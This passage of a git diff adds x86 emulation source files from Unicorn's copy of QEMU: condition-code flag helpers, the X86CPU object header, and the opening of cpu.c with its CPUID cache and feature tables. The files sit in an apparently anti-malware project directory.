CC_OP_SARW: + return compute_all_sarw(dst, src1); + case CC_OP_SARL: + return compute_all_sarl(dst, src1); + + case CC_OP_BMILGB: + return compute_all_bmilgb(dst, src1); + case CC_OP_BMILGW: + return compute_all_bmilgw(dst, src1); + case CC_OP_BMILGL: + return compute_all_bmilgl(dst, src1); + + case CC_OP_ADCX: + return compute_all_adcx(dst, src1, src2); + case CC_OP_ADOX: + return compute_all_adox(dst, src1, src2); + case CC_OP_ADCOX: + return compute_all_adcox(dst, src1, src2); + +#ifdef TARGET_X86_64 + case CC_OP_MULQ: + return compute_all_mulq(dst, src1); + case CC_OP_ADDQ: + return compute_all_addq(dst, src1); + case CC_OP_ADCQ: + return compute_all_adcq(dst, src1, src2); + case CC_OP_SUBQ: + return compute_all_subq(dst, src1); + case CC_OP_SBBQ: + return compute_all_sbbq(dst, src1, src2); + case CC_OP_LOGICQ: + return compute_all_logicq(dst, src1); + case CC_OP_INCQ: + return compute_all_incq(dst, src1); + case CC_OP_DECQ: + return compute_all_decq(dst, src1); + case CC_OP_SHLQ: + return compute_all_shlq(dst, src1); + case CC_OP_SARQ: + return compute_all_sarq(dst, src1); + case CC_OP_BMILGQ: + return compute_all_bmilgq(dst, src1); +#endif + } +} + +uint32_t cpu_cc_compute_all(CPUX86State *env, int op) +{ + return (uint32_t)helper_cc_compute_all(CC_DST, CC_SRC, CC_SRC2, op); +} + +target_ulong helper_cc_compute_c(target_ulong dst, target_ulong src1, + target_ulong src2, int op) +{ + switch (op) { + default: /* should never happen */ + case CC_OP_LOGICB: + case CC_OP_LOGICW: + case CC_OP_LOGICL: + case CC_OP_LOGICQ: + case CC_OP_CLR: + return 0; + + case CC_OP_EFLAGS: + case CC_OP_SARB: + case CC_OP_SARW: + case CC_OP_SARL: + case CC_OP_SARQ: + case CC_OP_ADOX: + return src1 & 1; + + case CC_OP_INCB: + case CC_OP_INCW: + case CC_OP_INCL: + case CC_OP_INCQ: + case CC_OP_DECB: + case CC_OP_DECW: + case CC_OP_DECL: + case CC_OP_DECQ: + return src1; + + case CC_OP_MULB: + case CC_OP_MULW: + case CC_OP_MULL: + case CC_OP_MULQ: + return src1 != 0; + + case 
CC_OP_ADCX: + case CC_OP_ADCOX: + return dst; + + case CC_OP_ADDB: + return compute_c_addb(dst, src1); + case CC_OP_ADDW: + return compute_c_addw(dst, src1); + case CC_OP_ADDL: + return compute_c_addl(dst, src1); + + case CC_OP_ADCB: + return compute_c_adcb(dst, src1, src2); + case CC_OP_ADCW: + return compute_c_adcw(dst, src1, src2); + case CC_OP_ADCL: + return compute_c_adcl(dst, src1, src2); + + case CC_OP_SUBB: + return compute_c_subb(dst, src1); + case CC_OP_SUBW: + return compute_c_subw(dst, src1); + case CC_OP_SUBL: + return compute_c_subl(dst, src1); + + case CC_OP_SBBB: + return compute_c_sbbb(dst, src1, src2); + case CC_OP_SBBW: + return compute_c_sbbw(dst, src1, src2); + case CC_OP_SBBL: + return compute_c_sbbl(dst, src1, src2); + + case CC_OP_SHLB: + return compute_c_shlb(dst, src1); + case CC_OP_SHLW: + return compute_c_shlw(dst, src1); + case CC_OP_SHLL: + return compute_c_shll(dst, src1); + + case CC_OP_BMILGB: + return compute_c_bmilgb(dst, src1); + case CC_OP_BMILGW: + return compute_c_bmilgw(dst, src1); + case CC_OP_BMILGL: + return compute_c_bmilgl(dst, src1); + +#ifdef TARGET_X86_64 + case CC_OP_ADDQ: + return compute_c_addq(dst, src1); + case CC_OP_ADCQ: + return compute_c_adcq(dst, src1, src2); + case CC_OP_SUBQ: + return compute_c_subq(dst, src1); + case CC_OP_SBBQ: + return compute_c_sbbq(dst, src1, src2); + case CC_OP_SHLQ: + return compute_c_shlq(dst, src1); + case CC_OP_BMILGQ: + return compute_c_bmilgq(dst, src1); +#endif + } +} + +void helper_write_eflags(CPUX86State *env, target_ulong t0, + uint32_t update_mask) +{ + cpu_load_eflags(env, (int)t0, update_mask); +} + +target_ulong helper_read_eflags(CPUX86State *env) +{ + return cpu_compute_eflags(env); +} + +void helper_clts(CPUX86State *env) +{ + env->cr[0] &= ~CR0_TS_MASK; + env->hflags &= ~HF_TS_MASK; +} + +void helper_reset_rf(CPUX86State *env) +{ + env->eflags &= ~RF_MASK; +} + +void helper_cli(CPUX86State *env) +{ + env->eflags &= ~IF_MASK; +} + +void helper_sti(CPUX86State *env) 
+{ + env->eflags |= IF_MASK; +} + +void helper_clac(CPUX86State *env) +{ + env->eflags &= ~AC_MASK; +} + +void helper_stac(CPUX86State *env) +{ + env->eflags |= AC_MASK; +} + +#if 0 +/* vm86plus instructions */ +void helper_cli_vm(CPUX86State *env) +{ + env->eflags &= ~VIF_MASK; +} + +void helper_sti_vm(CPUX86State *env) +{ + env->eflags |= VIF_MASK; + if (env->eflags & VIP_MASK) { + raise_exception(env, EXCP0D_GPF); + } +} +#endif + +void helper_set_inhibit_irq(CPUX86State *env) +{ + env->hflags |= HF_INHIBIT_IRQ_MASK; +} + +void helper_reset_inhibit_irq(CPUX86State *env) +{ + env->hflags &= ~HF_INHIBIT_IRQ_MASK; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cc_helper_template.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cc_helper_template.h new file mode 100644 index 0000000..dc34d0d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cc_helper_template.h @@ -0,0 +1,242 @@ +/* + * x86 condition code helpers + * + * Copyright (c) 2008 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . 
+ */ + +#define DATA_BITS (1 << (3 + SHIFT)) + +#if DATA_BITS == 8 +#define SUFFIX b +#define DATA_TYPE uint8_t +#elif DATA_BITS == 16 +#define SUFFIX w +#define DATA_TYPE uint16_t +#elif DATA_BITS == 32 +#define SUFFIX l +#define DATA_TYPE uint32_t +#elif DATA_BITS == 64 +#define SUFFIX q +#define DATA_TYPE uint64_t +#else +#error unhandled operand size +#endif + +#define SIGN_MASK (((DATA_TYPE)1) << (DATA_BITS - 1)) + +/* dynamic flags computation */ + +static int glue(compute_all_add, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) +{ + int cf, pf, af, zf, sf, of; + DATA_TYPE src2 = dst - src1; + + cf = dst < src1; + pf = parity_table[(uint8_t)dst]; + af = (dst ^ src1 ^ src2) & CC_A; + zf = (dst == 0) * CC_Z; + sf = lshift(dst, 8 - DATA_BITS) & CC_S; + of = lshift((src1 ^ src2 ^ -1) & (src1 ^ dst), 12 - DATA_BITS) & CC_O; + return cf | pf | af | zf | sf | of; +} + +static int glue(compute_c_add, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) +{ + return dst < src1; +} + +static int glue(compute_all_adc, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1, + DATA_TYPE src3) +{ + int cf, pf, af, zf, sf, of; + DATA_TYPE src2 = dst - src1 - src3; + + cf = (src3 ? dst <= src1 : dst < src1); + pf = parity_table[(uint8_t)dst]; + af = (dst ^ src1 ^ src2) & 0x10; + zf = (dst == 0) << 6; + sf = lshift(dst, 8 - DATA_BITS) & 0x80; + of = lshift((src1 ^ src2 ^ -1) & (src1 ^ dst), 12 - DATA_BITS) & CC_O; + return cf | pf | af | zf | sf | of; +} + +static int glue(compute_c_adc, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1, + DATA_TYPE src3) +{ + return src3 ? 
dst <= src1 : dst < src1; +} + +static int glue(compute_all_sub, SUFFIX)(DATA_TYPE dst, DATA_TYPE src2) +{ + int cf, pf, af, zf, sf, of; + DATA_TYPE src1 = dst + src2; + + cf = src1 < src2; + pf = parity_table[(uint8_t)dst]; + af = (dst ^ src1 ^ src2) & CC_A; + zf = (dst == 0) * CC_Z; + sf = lshift(dst, 8 - DATA_BITS) & CC_S; + of = lshift((src1 ^ src2) & (src1 ^ dst), 12 - DATA_BITS) & CC_O; + return cf | pf | af | zf | sf | of; +} + +static int glue(compute_c_sub, SUFFIX)(DATA_TYPE dst, DATA_TYPE src2) +{ + DATA_TYPE src1 = dst + src2; + + return src1 < src2; +} + +static int glue(compute_all_sbb, SUFFIX)(DATA_TYPE dst, DATA_TYPE src2, + DATA_TYPE src3) +{ + int cf, pf, af, zf, sf, of; + DATA_TYPE src1 = dst + src2 + src3; + + cf = (src3 ? src1 <= src2 : src1 < src2); + pf = parity_table[(uint8_t)dst]; + af = (dst ^ src1 ^ src2) & 0x10; + zf = (dst == 0) << 6; + sf = lshift(dst, 8 - DATA_BITS) & 0x80; + of = lshift((src1 ^ src2) & (src1 ^ dst), 12 - DATA_BITS) & CC_O; + return cf | pf | af | zf | sf | of; +} + +static int glue(compute_c_sbb, SUFFIX)(DATA_TYPE dst, DATA_TYPE src2, + DATA_TYPE src3) +{ + DATA_TYPE src1 = dst + src2 + src3; + + return (src3 ? 
src1 <= src2 : src1 < src2); +} + +static int glue(compute_all_logic, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) +{ + int cf, pf, af, zf, sf, of; + + cf = 0; + pf = parity_table[(uint8_t)dst]; + af = 0; + zf = (dst == 0) * CC_Z; + sf = lshift(dst, 8 - DATA_BITS) & CC_S; + of = 0; + return cf | pf | af | zf | sf | of; +} + +static int glue(compute_all_inc, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) +{ + int cf, pf, af, zf, sf, of; + DATA_TYPE src2; + + cf = (int)src1; + src1 = dst - 1; + src2 = 1; + pf = parity_table[(uint8_t)dst]; + af = (dst ^ src1 ^ src2) & CC_A; + zf = (dst == 0) * CC_Z; + sf = lshift(dst, 8 - DATA_BITS) & CC_S; + of = (dst == SIGN_MASK) * CC_O; + return cf | pf | af | zf | sf | of; +} + +static int glue(compute_all_dec, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) +{ + int cf, pf, af, zf, sf, of; + DATA_TYPE src2; + + cf = (int)src1; + src1 = dst + 1; + src2 = 1; + pf = parity_table[(uint8_t)dst]; + af = (dst ^ src1 ^ src2) & CC_A; + zf = (dst == 0) * CC_Z; + sf = lshift(dst, 8 - DATA_BITS) & CC_S; + of = (dst == SIGN_MASK - 1) * CC_O; + return cf | pf | af | zf | sf | of; +} + +static int glue(compute_all_shl, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) +{ + int cf, pf, af, zf, sf, of; + + cf = (src1 >> (DATA_BITS - 1)) & CC_C; + pf = parity_table[(uint8_t)dst]; + af = 0; /* undefined */ + zf = (dst == 0) * CC_Z; + sf = lshift(dst, 8 - DATA_BITS) & CC_S; + /* of is defined iff shift count == 1 */ + of = lshift(src1 ^ dst, 12 - DATA_BITS) & CC_O; + return cf | pf | af | zf | sf | of; +} + +static int glue(compute_c_shl, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) +{ + return (src1 >> (DATA_BITS - 1)) & CC_C; +} + +static int glue(compute_all_sar, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) +{ + int cf, pf, af, zf, sf, of; + + cf = src1 & 1; + pf = parity_table[(uint8_t)dst]; + af = 0; /* undefined */ + zf = (dst == 0) * CC_Z; + sf = lshift(dst, 8 - DATA_BITS) & CC_S; + /* of is defined iff shift count == 1 */ + of = lshift(src1 ^ dst, 12 - DATA_BITS) & CC_O; + return cf | 
pf | af | zf | sf | of; +} + +/* NOTE: we compute the flags like the P4. On olders CPUs, only OF and + CF are modified and it is slower to do that. Note as well that we + don't truncate SRC1 for computing carry to DATA_TYPE. */ +static int glue(compute_all_mul, SUFFIX)(DATA_TYPE dst, target_long src1) +{ + int cf, pf, af, zf, sf, of; + + cf = (src1 != 0); + pf = parity_table[(uint8_t)dst]; + af = 0; /* undefined */ + zf = (dst == 0) * CC_Z; + sf = lshift(dst, 8 - DATA_BITS) & CC_S; + of = cf * CC_O; + return cf | pf | af | zf | sf | of; +} + +static int glue(compute_all_bmilg, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) +{ + int cf, pf, af, zf, sf, of; + + cf = (src1 == 0); + pf = 0; /* undefined */ + af = 0; /* undefined */ + zf = (dst == 0) * CC_Z; + sf = lshift(dst, 8 - DATA_BITS) & CC_S; + of = 0; + return cf | pf | af | zf | sf | of; +} + +static int glue(compute_c_bmilg, SUFFIX)(DATA_TYPE dst, DATA_TYPE src1) +{ + return src1 == 0; +} + +#undef DATA_BITS +#undef SIGN_MASK +#undef DATA_TYPE +#undef DATA_MASK +#undef SUFFIX diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cpu-qom.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cpu-qom.h new file mode 100644 index 0000000..5d19fc4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cpu-qom.h @@ -0,0 +1,157 @@ +/* + * QEMU x86 CPU + * + * Copyright (c) 2012 SUSE LINUX Products GmbH + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2.1 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. 
+ * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see + * + */ +#ifndef QEMU_I386_CPU_QOM_H +#define QEMU_I386_CPU_QOM_H + +#include "qom/cpu.h" +#include "cpu.h" +#include "qapi/error.h" + +#ifdef TARGET_X86_64 +#define TYPE_X86_CPU "x86_64-cpu" +#else +#define TYPE_X86_CPU "i386-cpu" +#endif + +#define X86_CPU_CLASS(uc, klass) \ + OBJECT_CLASS_CHECK(uc, X86CPUClass, (klass), TYPE_X86_CPU) +#define X86_CPU(uc, obj) ((X86CPU *)obj) +#define X86_CPU_GET_CLASS(uc, obj) \ + OBJECT_GET_CLASS(uc, X86CPUClass, (obj), TYPE_X86_CPU) + +/** + * X86CPUDefinition: + * + * CPU model definition data that was not converted to QOM per-subclass + * property defaults yet. + */ +typedef struct X86CPUDefinition X86CPUDefinition; + +/** + * X86CPUClass: + * @cpu_def: CPU model definition + * @kvm_required: Whether CPU model requires KVM to be enabled. + * @parent_realize: The parent class' realize handler. + * @parent_reset: The parent class' reset handler. + * + * An x86 CPU model or family. + */ +typedef struct X86CPUClass { + /*< private >*/ + CPUClass parent_class; + /*< public >*/ + + /* Should be eventually replaced by subclass-specific property defaults. */ + X86CPUDefinition *cpu_def; + + bool kvm_required; + + DeviceRealize parent_realize; + void (*parent_reset)(CPUState *cpu); +} X86CPUClass; + +/** + * X86CPU: + * @env: #CPUX86State + * @migratable: If set, only migratable flags will be accepted when "enforce" + * mode is used, and only migratable flags will be included in the "host" + * CPU model. + * + * An x86 CPU. 
+ */ +typedef struct X86CPU { + /*< private >*/ + CPUState parent_obj; + /*< public >*/ + + CPUX86State env; + + bool hyperv_vapic; + bool hyperv_relaxed_timing; + int hyperv_spinlock_attempts; + bool hyperv_time; + bool check_cpuid; + bool enforce_cpuid; + bool expose_kvm; + bool migratable; + bool host_features; + + /* if true the CPUID code directly forward host cache leaves to the guest */ + bool cache_info_passthrough; + + /* Features that were filtered out because of missing host capabilities */ + uint32_t filtered_features[FEATURE_WORDS]; + + /* Enable PMU CPUID bits. This can't be enabled by default yet because + * it doesn't have ABI stability guarantees, as it passes all PMU CPUID + * bits returned by GET_SUPPORTED_CPUID (that depend on host CPU and kernel + * capabilities) directly to the guest. + */ + bool enable_pmu; + + /* in order to simplify APIC support, we leave this pointer to the + user */ + struct DeviceState *apic_state; +} X86CPU; + +static inline X86CPU *x86_env_get_cpu(CPUX86State *env) +{ + return container_of(env, X86CPU, env); +} + +#define ENV_GET_CPU(e) CPU(x86_env_get_cpu(e)) + +#define ENV_OFFSET offsetof(X86CPU, env) + +#ifndef CONFIG_USER_ONLY +extern struct VMStateDescription vmstate_x86_cpu; +#endif + +/** + * x86_cpu_do_interrupt: + * @cpu: vCPU the interrupt is to be handled by. 
+ */ +void x86_cpu_do_interrupt(CPUState *cpu); +bool x86_cpu_exec_interrupt(CPUState *cpu, int int_req); + +int x86_cpu_write_elf64_note(WriteCoreDumpFunction f, CPUState *cpu, + int cpuid, void *opaque); +int x86_cpu_write_elf32_note(WriteCoreDumpFunction f, CPUState *cpu, + int cpuid, void *opaque); +int x86_cpu_write_elf64_qemunote(WriteCoreDumpFunction f, CPUState *cpu, + void *opaque); +int x86_cpu_write_elf32_qemunote(WriteCoreDumpFunction f, CPUState *cpu, + void *opaque); + +void x86_cpu_get_memory_mapping(CPUState *cpu, MemoryMappingList *list, + Error **errp); + +void x86_cpu_dump_state(CPUState *cs, FILE *f, fprintf_function cpu_fprintf, + int flags); + +hwaddr x86_cpu_get_phys_page_debug(CPUState *cpu, vaddr addr); + +int x86_cpu_gdb_read_register(CPUState *cpu, uint8_t *buf, int reg); +int x86_cpu_gdb_write_register(CPUState *cpu, uint8_t *buf, int reg); + +void x86_cpu_exec_enter(CPUState *cpu); +void x86_cpu_exec_exit(CPUState *cpu); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cpu.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cpu.c new file mode 100644 index 0000000..7f574a3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/cpu.c @@ -0,0 +1,2633 @@ +/* + * i386 CPUID helper functions + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . 
+ */ +#include +#include +#include +#include "unicorn/platform.h" + +#include "cpu.h" +#include "sysemu/cpus.h" +#include "topology.h" + +#include "qapi/qmp/qerror.h" + +#include "qapi-types.h" +#include "qapi-visit.h" +#include "qapi/visitor.h" + +#include "hw/hw.h" + +#include "sysemu/sysemu.h" +#include "hw/cpu/icc_bus.h" +#ifndef CONFIG_USER_ONLY +#include "hw/i386/apic_internal.h" +#endif + +/* Cache topology CPUID constants: */ + +/* CPUID Leaf 2 Descriptors */ + +#define CPUID_2_L1D_32KB_8WAY_64B 0x2c +#define CPUID_2_L1I_32KB_8WAY_64B 0x30 +#define CPUID_2_L2_2MB_8WAY_64B 0x7d + + +/* CPUID Leaf 4 constants: */ + +/* EAX: */ +#define CPUID_4_TYPE_DCACHE 1 +#define CPUID_4_TYPE_ICACHE 2 +#define CPUID_4_TYPE_UNIFIED 3 + +#define CPUID_4_LEVEL(l) ((l) << 5) + +#define CPUID_4_SELF_INIT_LEVEL (1 << 8) +#define CPUID_4_FULLY_ASSOC (1 << 9) + +/* EDX: */ +#define CPUID_4_NO_INVD_SHARING (1 << 0) +#define CPUID_4_INCLUSIVE (1 << 1) +#define CPUID_4_COMPLEX_IDX (1 << 2) + +#define ASSOC_FULL 0xFF + +/* AMD associativity encoding used on CPUID Leaf 0x80000006: */ +#define AMD_ENC_ASSOC(a) (a <= 1 ? a : \ + a == 2 ? 0x2 : \ + a == 4 ? 0x4 : \ + a == 8 ? 0x6 : \ + a == 16 ? 0x8 : \ + a == 32 ? 0xA : \ + a == 48 ? 0xB : \ + a == 64 ? 0xC : \ + a == 96 ? 0xD : \ + a == 128 ? 0xE : \ + a == ASSOC_FULL ? 
0xF : \ + 0 /* invalid value */) + + +/* Definitions of the hardcoded cache entries we expose: */ + +/* L1 data cache: */ +#define L1D_LINE_SIZE 64 +#define L1D_ASSOCIATIVITY 8 +#define L1D_SETS 64 +#define L1D_PARTITIONS 1 +/* Size = LINE_SIZE*ASSOCIATIVITY*SETS*PARTITIONS = 32KiB */ +#define L1D_DESCRIPTOR CPUID_2_L1D_32KB_8WAY_64B +/*FIXME: CPUID leaf 0x80000005 is inconsistent with leaves 2 & 4 */ +#define L1D_LINES_PER_TAG 1 +#define L1D_SIZE_KB_AMD 64 +#define L1D_ASSOCIATIVITY_AMD 2 + +/* L1 instruction cache: */ +#define L1I_LINE_SIZE 64 +#define L1I_ASSOCIATIVITY 8 +#define L1I_SETS 64 +#define L1I_PARTITIONS 1 +/* Size = LINE_SIZE*ASSOCIATIVITY*SETS*PARTITIONS = 32KiB */ +#define L1I_DESCRIPTOR CPUID_2_L1I_32KB_8WAY_64B +/*FIXME: CPUID leaf 0x80000005 is inconsistent with leaves 2 & 4 */ +#define L1I_LINES_PER_TAG 1 +#define L1I_SIZE_KB_AMD 64 +#define L1I_ASSOCIATIVITY_AMD 2 + +/* Level 2 unified cache: */ +#define L2_LINE_SIZE 64 +#define L2_ASSOCIATIVITY 16 +#define L2_SETS 4096 +#define L2_PARTITIONS 1 +/* Size = LINE_SIZE*ASSOCIATIVITY*SETS*PARTITIONS = 4MiB */ +/*FIXME: CPUID leaf 2 descriptor is inconsistent with CPUID leaf 4 */ +#define L2_DESCRIPTOR CPUID_2_L2_2MB_8WAY_64B +/*FIXME: CPUID leaf 0x80000006 is inconsistent with leaves 2 & 4 */ +#define L2_LINES_PER_TAG 1 +#define L2_SIZE_KB_AMD 512 + +/* No L3 cache: */ +#define L3_SIZE_KB 0 /* disabled */ +#define L3_ASSOCIATIVITY 0 /* disabled */ +#define L3_LINES_PER_TAG 0 /* disabled */ +#define L3_LINE_SIZE 0 /* disabled */ + +/* TLB definitions: */ + +#define L1_DTLB_2M_ASSOC 1 +#define L1_DTLB_2M_ENTRIES 255 +#define L1_DTLB_4K_ASSOC 1 +#define L1_DTLB_4K_ENTRIES 255 + +#define L1_ITLB_2M_ASSOC 1 +#define L1_ITLB_2M_ENTRIES 255 +#define L1_ITLB_4K_ASSOC 1 +#define L1_ITLB_4K_ENTRIES 255 + +#define L2_DTLB_2M_ASSOC 0 /* disabled */ +#define L2_DTLB_2M_ENTRIES 0 /* disabled */ +#define L2_DTLB_4K_ASSOC 4 +#define L2_DTLB_4K_ENTRIES 512 + +#define L2_ITLB_2M_ASSOC 0 /* disabled */ +#define 
L2_ITLB_2M_ENTRIES 0 /* disabled */ +#define L2_ITLB_4K_ASSOC 4 +#define L2_ITLB_4K_ENTRIES 512 + +void x86_cpu_register_types(void *); + +static void x86_cpu_vendor_words2str(char *dst, uint32_t vendor1, + uint32_t vendor2, uint32_t vendor3) +{ + int i; + for (i = 0; i < 4; i++) { + dst[i] = vendor1 >> (8 * i); + dst[i + 4] = vendor2 >> (8 * i); + dst[i + 8] = vendor3 >> (8 * i); + } + dst[CPUID_VENDOR_SZ] = '\0'; +} + +/* feature flags taken from "Intel Processor Identification and the CPUID + * Instruction" and AMD's "CPUID Specification". In cases of disagreement + * between feature naming conventions, aliases may be added. + */ +static const char *feature_name[] = { + "fpu", "vme", "de", "pse", + "tsc", "msr", "pae", "mce", + "cx8", "apic", NULL, "sep", + "mtrr", "pge", "mca", "cmov", + "pat", "pse36", "pn" /* Intel psn */, "clflush" /* Intel clfsh */, + NULL, "ds" /* Intel dts */, "acpi", "mmx", + "fxsr", "sse", "sse2", "ss", + "ht" /* Intel htt */, "tm", "ia64", "pbe", +}; +static const char *ext_feature_name[] = { + "pni|sse3" /* Intel,AMD sse3 */, "pclmulqdq|pclmuldq", "dtes64", "monitor", + "ds_cpl", "vmx", "smx", "est", + "tm2", "ssse3", "cid", NULL, + "fma", "cx16", "xtpr", "pdcm", + NULL, "pcid", "dca", "sse4.1|sse4_1", + "sse4.2|sse4_2", "x2apic", "movbe", "popcnt", + "tsc-deadline", "aes", "xsave", "osxsave", + "avx", "f16c", "rdrand", "hypervisor", +}; +/* Feature names that are already defined on feature_name[] but are set on + * CPUID[8000_0001].EDX on AMD CPUs don't have their names on + * ext2_feature_name[]. They are copied automatically to cpuid_ext2_features + * if and only if CPU vendor is AMD. 
+ */ +static const char *ext2_feature_name[] = { + NULL /* fpu */, NULL /* vme */, NULL /* de */, NULL /* pse */, + NULL /* tsc */, NULL /* msr */, NULL /* pae */, NULL /* mce */, + NULL /* cx8 */ /* AMD CMPXCHG8B */, NULL /* apic */, NULL, "syscall", + NULL /* mtrr */, NULL /* pge */, NULL /* mca */, NULL /* cmov */, + NULL /* pat */, NULL /* pse36 */, NULL, NULL /* Linux mp */, + "nx|xd", NULL, "mmxext", NULL /* mmx */, + NULL /* fxsr */, "fxsr_opt|ffxsr", "pdpe1gb" /* AMD Page1GB */, "rdtscp", + NULL, "lm|i64", "3dnowext", "3dnow", +}; +static const char *ext3_feature_name[] = { + "lahf_lm" /* AMD LahfSahf */, "cmp_legacy", "svm", "extapic" /* AMD ExtApicSpace */, + "cr8legacy" /* AMD AltMovCr8 */, "abm", "sse4a", "misalignsse", + "3dnowprefetch", "osvw", "ibs", "xop", + "skinit", "wdt", NULL, "lwp", + "fma4", "tce", NULL, "nodeid_msr", + NULL, "tbm", "topoext", "perfctr_core", + "perfctr_nb", NULL, NULL, NULL, + NULL, NULL, NULL, NULL, +}; + +static const char *ext4_feature_name[] = { + NULL, NULL, "xstore", "xstore-en", + NULL, NULL, "xcrypt", "xcrypt-en", + "ace2", "ace2-en", "phe", "phe-en", + "pmm", "pmm-en", NULL, NULL, + NULL, NULL, NULL, NULL, + NULL, NULL, NULL, NULL, + NULL, NULL, NULL, NULL, + NULL, NULL, NULL, NULL, +}; + +static const char *cpuid_7_0_ebx_feature_name[] = { + "fsgsbase", "tsc_adjust", NULL, "bmi1", "hle", "avx2", NULL, "smep", + "bmi2", "erms", "invpcid", "rtm", NULL, NULL, "mpx", NULL, + "avx512f", NULL, "rdseed", "adx", "smap", NULL, NULL, NULL, + NULL, NULL, "avx512pf", "avx512er", "avx512cd", NULL, NULL, NULL, +}; + +static const char *cpuid_apm_edx_feature_name[] = { + NULL, NULL, NULL, NULL, + NULL, NULL, NULL, NULL, + "invtsc", NULL, NULL, NULL, + NULL, NULL, NULL, NULL, + NULL, NULL, NULL, NULL, + NULL, NULL, NULL, NULL, + NULL, NULL, NULL, NULL, + NULL, NULL, NULL, NULL, +}; + +#define I486_FEATURES (CPUID_FP87 | CPUID_VME | CPUID_PSE) +#define PENTIUM_FEATURES (I486_FEATURES | CPUID_DE | CPUID_TSC | \ + CPUID_MSR | 
CPUID_MCE | CPUID_CX8 | CPUID_MMX | CPUID_APIC) +#define PENTIUM2_FEATURES (PENTIUM_FEATURES | CPUID_PAE | CPUID_SEP | \ + CPUID_MTRR | CPUID_PGE | CPUID_MCA | CPUID_CMOV | CPUID_PAT | \ + CPUID_PSE36 | CPUID_FXSR) +#define PENTIUM3_FEATURES (PENTIUM2_FEATURES | CPUID_SSE) +#define PPRO_FEATURES (CPUID_FP87 | CPUID_DE | CPUID_PSE | CPUID_TSC | \ + CPUID_MSR | CPUID_MCE | CPUID_CX8 | CPUID_PGE | CPUID_CMOV | \ + CPUID_PAT | CPUID_FXSR | CPUID_MMX | CPUID_SSE | CPUID_SSE2 | \ + CPUID_PAE | CPUID_SEP | CPUID_APIC) + +#define TCG_FEATURES (CPUID_FP87 | CPUID_PSE | CPUID_TSC | CPUID_MSR | \ + CPUID_PAE | CPUID_MCE | CPUID_CX8 | CPUID_APIC | CPUID_SEP | \ + CPUID_MTRR | CPUID_PGE | CPUID_MCA | CPUID_CMOV | CPUID_PAT | \ + CPUID_PSE36 | CPUID_CLFLUSH | CPUID_ACPI | CPUID_MMX | \ + CPUID_FXSR | CPUID_SSE | CPUID_SSE2 | CPUID_SS) + /* partly implemented: + CPUID_MTRR, CPUID_MCA, CPUID_CLFLUSH (needed for Win64) */ + /* missing: + CPUID_VME, CPUID_DTS, CPUID_SS, CPUID_HT, CPUID_TM, CPUID_PBE */ +#define TCG_EXT_FEATURES (CPUID_EXT_SSE3 | CPUID_EXT_PCLMULQDQ | \ + CPUID_EXT_MONITOR | CPUID_EXT_SSSE3 | CPUID_EXT_CX16 | \ + CPUID_EXT_SSE41 | CPUID_EXT_SSE42 | CPUID_EXT_POPCNT | \ + CPUID_EXT_MOVBE | CPUID_EXT_AES | CPUID_EXT_HYPERVISOR) + /* missing: + CPUID_EXT_DTES64, CPUID_EXT_DSCPL, CPUID_EXT_VMX, CPUID_EXT_SMX, + CPUID_EXT_EST, CPUID_EXT_TM2, CPUID_EXT_CID, CPUID_EXT_FMA, + CPUID_EXT_XTPR, CPUID_EXT_PDCM, CPUID_EXT_PCID, CPUID_EXT_DCA, + CPUID_EXT_X2APIC, CPUID_EXT_TSC_DEADLINE_TIMER, CPUID_EXT_XSAVE, + CPUID_EXT_OSXSAVE, CPUID_EXT_AVX, CPUID_EXT_F16C, + CPUID_EXT_RDRAND */ + +#ifdef TARGET_X86_64 +#define TCG_EXT2_X86_64_FEATURES (CPUID_EXT2_SYSCALL | CPUID_EXT2_LM) +#else +#define TCG_EXT2_X86_64_FEATURES 0 +#endif + +#define TCG_EXT2_FEATURES ((TCG_FEATURES & CPUID_EXT2_AMD_ALIASES) | \ + CPUID_EXT2_NX | CPUID_EXT2_MMXEXT | CPUID_EXT2_RDTSCP | \ + CPUID_EXT2_3DNOW | CPUID_EXT2_3DNOWEXT | CPUID_EXT2_PDPE1GB | \ + TCG_EXT2_X86_64_FEATURES) +#define TCG_EXT3_FEATURES 
